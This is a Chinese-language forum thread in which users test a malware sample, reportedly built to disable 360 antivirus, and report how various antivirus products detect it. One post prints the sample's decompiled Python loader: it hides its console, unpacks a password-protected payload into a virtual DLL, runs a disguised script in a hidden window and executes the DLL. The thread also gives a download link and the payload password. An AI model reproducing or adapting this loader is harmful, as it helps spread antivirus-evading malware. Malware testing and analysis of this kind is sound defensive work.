1X

dght432

https://www.123pan.com/s/rUVyVv-7YMJ3.html
可以干掉360

swizzer

Avast

NSIS:MalwareX-gen

biue

腾讯电脑管家 1X

不知起什么名

火绒 kill
SilentInstaller.exe >> [NSIS].nsi, 病毒名：HEUR:Trojan/Fake.ag, 病毒ID：27c5005a1178cd7c

心醉咖啡

金山毒霸扫描miss

btbtg

干掉之后再启动360杀毒或者腾讯管家都会闪退，打开几次360杀毒就会自动启动急救箱扫描，但是要手动改成强力模式才能扫描到，重启之后360杀毒正常运行

aikafans

eset 扫描 miss但是双击后内存杀
有联网动作

wywt123

1. import ctypes
   
2. import os
   
3. import zipfile
   
4. TRUE = 1
   
5. FALSE = 0
   
6. GENERIC_WRITE = 1073741824
   
7. FILE_SHARE_READ = 1
   
8. FILE_SHARE_WRITE = 2
   
9. CREATE_ALWAYS = 2
   
10. FILE_ATTRIBUTE_NORMAL = 128
    
11. STARTF_USESHOWWINDOW = 1
    
12. SW_HIDE = 0
    
13. SW_SHOW = 5
    
14. kernel32 = ctypes.WinDLL('kernel32', True, **('use_last_error',))
    
15. user32 = ctypes.WinDLL('user32', True, **('use_last_error',))
    
16. 
    
17. def get_console_window():
    
18.     return kernel32.GetConsoleWindow()
    
19. 
    
20. 
    
21. def show_window(window_handle, command):
    
22.     user32.ShowWindow(window_handle, command)
    
23. 
    
24. 
    
25. class STARTUPINFO(ctypes.Structure):
    
26.     _fields_ = [
    
27.         ('cb', ctypes.c_ulong),
    
28.         ('lpReserved', ctypes.c_wchar_p),
    
29.         ('lpDesktop', ctypes.c_wchar_p),
    
30.         ('lpTitle', ctypes.c_wchar_p),
    
31.         ('dwX', ctypes.c_ulong),
    
32.         ('dwY', ctypes.c_ulong),
    
33.         ('dwXSize', ctypes.c_ulong),
    
34.         ('dwYSize', ctypes.c_ulong),
    
35.         ('dwXCountChars', ctypes.c_ulong),
    
36.         ('dwYCountChars', ctypes.c_ulong),
    
37.         ('dwFillAttribute', ctypes.c_ulong),
    
38.         ('dwFlags', ctypes.c_ulong),
    
39.         ('wShowWindow', ctypes.c_ushort),
    
40.         ('cbReserved2', ctypes.c_ushort),
    
41.         ('lpReserved2', ctypes.c_void_p),
    
42.         ('hStdInput', ctypes.c_void_p),
    
43.         ('hStdOutput', ctypes.c_void_p),
    
44.         ('hStdError', ctypes.c_void_p)]
    
45. 
    
46. 
    
47. class PROCESS_INFORMATION(ctypes.Structure):
    
48.     _fields_ = [
    
49.         ('hProcess', ctypes.c_void_p),
    
50.         ('hThread', ctypes.c_void_p),
    
51.         ('dwProcessId', ctypes.c_ulong),
    
52.         ('dwThreadId', ctypes.c_ulong)]
    
53. 
    
54. 
    
55. def start_process(python_executable, script_path):
    
56.     startupinfo = STARTUPINFO()
    
57.     process_information = PROCESS_INFORMATION()
    
58.     startupinfo.cb = ctypes.sizeof(startupinfo)
    
59.     startupinfo.dwFlags = STARTF_USESHOWWINDOW
    
60.     startupinfo.wShowWindow = SW_HIDE
    
61.     command_line = f'''"{python_executable}" "{script_path}"'''
    
62.     success = kernel32.CreateProcessW(None, command_line, None, None, False, 0, None, None, ctypes.byref(startupinfo), ctypes.byref(process_information))
    
63.     kernel32.CloseHandle(process_information.hProcess)
    
64.     kernel32.CloseHandle(process_information.hThread)
    
65. 
    
66. 
    
67. class MemoryStream(ctypes.Structure):
    
68.     _fields_ = [
    
69.         ('buffer', ctypes.POINTER(ctypes.c_ubyte)),
    
70.         ('size', ctypes.c_size_t)]
    
71.    
    
72.     def __init__(self, initial_size = (1024,)):
    
73.         self.size = initial_size
    
74.         self.buffer = ctypes.c_ubyte * self.size()
    
75. 
    
76.    
    
77.     def write(self, data):
    
78.         data_size = len(data)
    
79.         new_size = self.size + data_size
    
80.         new_buffer = ctypes.c_ubyte * new_size()
    
81.         ctypes.memmove(new_buffer, self.buffer, self.size)
    
82.         ctypes.memmove(ctypes.addressof(new_buffer) + self.size, data, data_size)
    
83.         self.buffer = new_buffer
    
84.         self.size = new_size
    
85. 
    
86.    
    
87.     def get_data(self):
    
88.         return bytes(self.buffer[:self.size])
    
89. 
    
90. 
    
91. 
    
92. def read_encrypted_zip(file_path, password, output_file_path):
    
93.     pass
    
94. # WARNING: Decompyle incomplete
    
95. 
    
96. if __name__ == '__main__':
    
97.     console_window = get_console_window()
    
98.     show_window(console_window, SW_HIDE)
    
99.     dll_path = os.path.abspath('bxsdk64.dll')
    
100.     bxsdk64 = ctypes.WinDLL(dll_path)
     
101.     bxsdk64.BoxedAppSDK_SetContext.argtypes = [
     
102.         ctypes.c_char_p]
     
103.     bxsdk64.BoxedAppSDK_SetContext.restype = None
     
104.     bxsdk64.BoxedAppSDK_Init.argtypes = []
     
105.     bxsdk64.BoxedAppSDK_Init.restype = None
     
106.     bxsdk64.BoxedAppSDK_EnableOption.argtypes = [
     
107.         ctypes.c_int,
     
108.         ctypes.c_int]
     
109.     bxsdk64.BoxedAppSDK_EnableOption.restype = None
     
110.     bxsdk64.BoxedAppSDK_CreateVirtualFileA.argtypes = [
     
111.         ctypes.c_char_p,
     
112.         ctypes.c_uint,
     
113.         ctypes.c_uint,
     
114.         ctypes.c_uint,
     
115.         ctypes.c_uint,
     
116.         ctypes.c_uint,
     
117.         ctypes.c_uint]
     
118.     bxsdk64.BoxedAppSDK_CreateVirtualFileA.restype = ctypes.c_void_p
     
119.     bxsdk64.BoxedAppSDK_Init()
     
120.     tmp_path = 'hello.dll'
     
121.     tmp_path_encoded = tmp_path.encode('utf-8')
     
122.     bxsdk64.BoxedAppSDK_CreateVirtualFileA(tmp_path_encoded, GENERIC_WRITE, FILE_SHARE_READ | FILE_SHARE_WRITE, 0, CREATE_ALWAYS, FILE_ATTRIBUTE_NORMAL, 0)
     
123.     read_encrypted_zip('hello.zip', 'laiba', tmp_path)
     
124.     current_dir = os.path.dirname(os.path.abspath(__file__))
     
125.     python_executable = os.path.join(current_dir, 'python_test.exe')
     
126.     script_path = os.path.join(current_dir, 'run_process.avi')
     
127.     start_process(python_executable, script_path)
     
128.     HELLO_path = os.path.abspath('hello.dll')
     
129.     hello_dll = ctypes.WinDLL(HELLO_path)
     
130.     hello_dll.StatRun.argtypes = []
     
131.     hello_dll.StatRun.restype = None
     
132.     hello_dll.StatRun()

复制代码

payload


密码laiba

御坂14857号

过智量双击，未拦截任何行为

kaba666

什么辣鸡样本？运行了10多分钟，没见干掉360，卡巴也没反应